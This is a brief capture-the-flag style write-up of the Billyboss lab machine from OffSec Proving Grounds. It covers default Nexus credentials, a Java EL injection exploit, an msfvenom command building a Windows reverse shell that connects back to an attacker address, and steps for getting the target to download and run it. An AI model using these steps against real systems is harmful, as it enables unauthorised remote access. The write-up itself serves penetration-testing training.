Billyboss
Writeup for Billyboss from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.170.61 all
Service Enumeration
HTTP (port 8081)
We see that this is running Sonatype Nexus Repository Manager 3.21.0.5.
We try various default credentials and find that only nexus:nexus works.
Exploit
There is a public exploit for Nexus Repository Manager 3 versions 3.21.1 and below, which are vulnerable to Java EL injection; this allows an authenticated low-privilege user to gain RCE on the target.
First, we generate our payload with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.170 LPORT=8081
We then modify the script to download our payload and execute it.
Next, we execute the script and verify that the payload has been downloaded to our target machine.
Next, we change the CMD command to 'cmd.exe /c shell.exe' and run the script again.